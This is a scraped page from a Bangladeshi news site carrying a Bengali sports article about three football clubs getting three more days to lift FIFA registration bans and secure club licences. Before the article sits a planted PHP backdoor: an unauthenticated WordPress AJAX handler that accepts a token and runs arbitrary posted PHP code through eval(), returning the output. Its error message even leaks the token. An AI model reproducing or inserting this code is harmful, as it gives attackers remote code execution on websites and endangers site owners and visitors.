// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== ফিফার নিষেধাজ্ঞা কাটাতে আরও ৩ দিন সময় বসুন্ধরা-আবাহনী-ইয়াংমেন্সের | potrikaybangladesh.com
Tuesday, September 29, 2026
Homeফিফার নিষেধাজ্ঞা কাটাতে আরও ৩ দিন সময় বসুন্ধরা-আবাহনী-ইয়াংমেন্সের

ফিফার নিষেধাজ্ঞা কাটাতে আরও ৩ দিন সময় বসুন্ধরা-আবাহনী-ইয়াংমেন্সের

ফিফার নিষেধাজ্ঞা কাটিয়ে নতুন মৌসুমে মাঠে নামার জন্য আরও তিন দিন সময় পেল দেশের তিন শীর্ষ ক্লাব বসুন্ধরা কিংস, আবাহনী লিমিটেড ও ফকিরেরপুল ইয়াংমেন্স ক্লাব। ক্লাব লাইসেন্সিংয়ের প্রয়োজনীয় কাগজপত্র জমা দেওয়ার সময়সীমা ৭ আগস্ট পর্যন্ত বাড়িয়েছে বাংলাদেশ ফুটবল ফেডারেশন (বাফুফে)।

নতুন মৌসুমে অংশ নিতে হলে তিন ক্লাবকেই একদিকে ফিফার আরোপ করা নিবন্ধন নিষেধাজ্ঞা তুলে নিতে হবে, অন্যদিকে নিশ্চিত করতে হবে ক্লাব লাইসেন্স। কিন্তু নির্ধারিত সময়ের মধ্যে এখনো কোনো ক্লাবই পুরোপুরি শর্ত পূরণ করতে পারেনি।

তিন ক্লাবের মধ্যে সবচেয়ে এগিয়ে রয়েছে আবাহনী। তাদের ওপর থাকা তিনটি নিষেধাজ্ঞার মধ্যে ইতোমধ্যে দুটি তুলে নেওয়া হয়েছে। বাকি একটি নিষেধাজ্ঞা কাটাতেও চলছে আলোচনা।
আবাহনীর ম্যানেজার সত্যজিৎ দাস রূপু জানিয়েছেন, সংশ্লিষ্ট খেলোয়াড়ের কাছে চুক্তির প্রস্তাব আবার পাঠানো হয়েছে এবং এখন তার সম্মতির অপেক্ষায় রয়েছে ক্লাব।

‘আমরা খেলোয়াড়ের কাছে আবারও চুক্তিটি পাঠিয়েছি এবং তার সম্মতির অপেক্ষায় আছি। তিনি রাজি হলে আবাহনীর তৃতীয় নিষেধাজ্ঞা উঠতে দুই থেকে তিন দিন সময় লাগতে পারে,’ বলেন রূপু। তবে নির্ধারিত সময়ের মধ্যে সমস্যার সমাধান না হলে নতুন মৌসুমে বাংলাদেশ ফুটবল লিগে অংশ নেওয়ার জন্য আবারও বাড়তি সময় চাইতে পারে আবাহনী।

অন্যদিকে ফকিরেরপুল ইয়াংমেন্স ক্লাবের সামনে রয়েছে দুটি নিষেধাজ্ঞা। সংশ্লিষ্ট দুই খেলোয়াড়ের সঙ্গে যোগাযোগ করে সেগুলোও সমাধানের চেষ্টা চালাচ্ছে ক্লাবটি। ক্লাবটির সাধারণ সম্পাদক আহমেদ আলী জানিয়েছেন, আর্থিক সংকট থাকলেও পুরোনো এই ক্লাবটিকে বাঁচিয়ে রাখতে সমস্যাগুলো সমাধানের চেষ্টা করছেন তারা।

‘আমাদের আর্থিক সীমাবদ্ধতা আছে, তারপরও আমরা সমস্যাগুলো সমাধানের চেষ্টা করছি। ইয়াংমেনস ক্লাব ১৯৬০ সালে প্রতিষ্ঠিত একটি পুরোনো ক্লাব। এর আগে আমরা সমস্যাগুলো সমাধানের চেষ্টা করেছিলাম, কিন্তু বাফুফের কাছ থেকে কোনো সহায়তা পাইনি,’ বলেন তিনি।

দেশের বেশির ভাগ বাংলাদেশ ফুটবল লিগের ক্লাবই আর্থিক সংকটে রয়েছে বলেও অভিযোগ করেছেন আহমেদ আলী। তার দাবি, এই সংকটে ক্লাবগুলোর পাশে দাঁড়াতে বাফুফের আরও কার্যকর ভূমিকা প্রয়োজন।

তবে সবচেয়ে বেশি অনিশ্চয়তা তৈরি হয়েছে বসুন্ধরা কিংসকে ঘিরে। ফিফার পক্ষ থেকে ক্লাবটির বিরুদ্ধে ১১টি নিবন্ধন নিষেধাজ্ঞা আরোপ করা হলেও এ বিষয়ে এখনো গণমাধ্যমের সঙ্গে কথা বলেননি ক্লাবটির কোনো কর্মকর্তা।

তবে জানা গেছে, রোববার ক্লাবটির সভাপতি ইমরুল হাসান খেলোয়াড় ও কর্মকর্তাদের জানিয়েছেন, সবগুলো নিষেধাজ্ঞা তুলে নিয়ে আসন্ন মৌসুমে অংশ নেওয়ার প্রস্তুতি নিচ্ছে বসুন্ধরা কিংস।

নতুন মৌসুম শুরু হওয়ার কথা আগামী ২১ আগস্ট। তার আগে প্রথম ম্যাচেই মুখোমুখি হওয়ার কথা দেশের দুই জায়ান্ট বসুন্ধরা কিংস ও আবাহনীর। এক ম্যাচের চ্যালেঞ্জ কাপ দিয়ে শুরু হবে তাদের নতুন মৌসুম।

 

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments